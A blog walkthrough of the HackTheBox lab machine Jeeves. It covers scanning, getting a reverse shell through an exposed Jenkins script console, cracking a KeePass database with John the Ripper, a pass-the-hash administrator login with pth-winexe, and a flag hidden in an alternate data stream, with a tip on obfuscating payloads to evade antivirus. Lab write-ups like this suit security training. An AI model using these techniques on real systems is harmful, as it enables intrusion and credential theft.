~ Walkthrough of Jeeves machine from HackTheBox ~
Jeeves is a medium rated machine on HackTheBox platform which got retired last weekend (18.05.2018). Core of this machine revolves around pwnage of Jenkins. Let’s get to it.
Scanning and Enumeration
As usual, start out with Nmap:
root@EdgeOfNight:~# nmap -sV -T4 -sS 10.10.10.63 Starting Nmap 7.60 ( https://nmap.org ) at 2018-05-22 18:24 BST Nmap scan report for 10.10.10.63 Host is up (0.062s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 50000/tcp open http Jetty 9.4.z-SNAPSHOT Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.28 seconds
For the sake of keeping this blogpost short, I’ll ignore enumeration of port 135 and 445 as they most likely aren’t part of the overall solution.
HTTP port 80
Upon visiting the HTTP server at port 80 we are present with somewhat custom made search engine.
Afterwards, I run Gobuster to search for any hidden content or directories, but find none. Not much one can do from here on… A dead end!
HTTP Port 50000
Same approach using Gobuster.
root@EdgeOfNight:~# gobuster -e -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 25 Gobuster v1.2 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://10.10.10.63:50000/ [+] Threads : 25 [+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes : 200,204,301,302,307 [+] Expanded : true ===================================================== http://10.10.10.63:50000/askjeeves (Status: 302)
Fortunately for us,
/askjeeves/ exposes an unprotected Jenkins install.
This allows us to either upload a malicious .exe file through job creation or run custom commands in the Jenkins console. I chose the latter. If you however decide to stick with job creation, make sure that the files you upload are well obfuscated so that the antivirus doesn’t delete them ;). I’d definitely recommend VeilFramework for this purpose.
Navigate to the script console (Manage Jenkins -> Script Console) -
This allows us to run arbitrary GroovyScript (similar to java) commands. Doing a bit of research, I find a GroovyScript reverse shell on GitHub.
If we rewrite the port and the host, we should be able to get a nice netcat reverse shell.
Awesome! User’s hash is located at
C:\Users\kohsuke\Desktop. Go and get it!
Unfortunately, we still need to escalate our privileges in order to capture all the flags. There are two main methods of doing so - cracking of .kdbx file and token impersonation (rotten potato method). Below, the first method will be described.
Keepas password manager
Doing a bit of roaming around the file system, I find an interesting .kdbx file. This file extension is associated with Keepass password manager. The mentiond .kdbx file can be found at
C:\Users\kohsuke\Documents\CEH.kdbx. To transfer this file into our computer I first put netcat binary (in Kali:
/usr/share/windows-binaries/nc.exe) onto the Windows system via Powershell:
Note: Don’t forget to start a web server before you actually try to download a file.
Thanks to netcat, we are able to transfer the .kdbx file into our filesystem. We can then proceed to generate a hash with keepass2john.
root@EdgeOfNight:/tmp# keepass2john CEH.kdbx CEH:$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
This hash can be then cracked with usual programs like Hashcat or JohnTheRipper.
root@EdgeOfNight:/tmp# john --format="keepass" --wordlist=/usr/share/wordlists/rockyou.txt hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (KeePass [SHA256 AES 32/64 OpenSSL]) Press 'q' or Ctrl-C to abort, almost any other key for status moonshine1 (CEH) 1g 0:00:01:12 DONE (2018-05-22 19:56) 0.01371g/s 754.2p/s 754.2c/s 754.2C/s moonshine1 Use the "--show" option to display all of the cracked passwords reliably Session completed
The master password of the Keepass manager is
moonshine1! By installing Keepass2 (apt-get install keepass2), we can view the .kdbx file and see all saved up passwords.
The preview looks like this:
None of these passwords are actually usable apart from Backup stuff.
Does this look similar -
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00? Yup! It is an NTLM hash which we can use for pass the hash attack! Both Metasploit’s psexec module or pth-winexe can be used.
root@EdgeOfNight:~# pth-winexe -U ./Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd.exe E_md4hash wrapper called. HASH PASS: Substituting user supplied NTLM HASH... Microsoft Windows [Version 10.0.10586] (c) 2015 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami jeeves\administrator
Normally I’d end the blog here as we gained root / administrator privileges. However, retrieving the root flag is a bit tricky. This is the part where most people get frustrated, because normal directory listing doesn’t yield any useful results. The flag itself is hidden inside an alternate data stream. Alternate data streams can be listed with
and viewed with
more < hm.txt:root.txt:
Congratulations! At this point there’s nothing left - both flags have been retrieved. If you want to view alternative methods which I didn’t show (such as rotten potato), I’d highly recommend Ippsec’s video. His content is great and I often learn many new methods from his tutorials :-) ! Thanks for reading.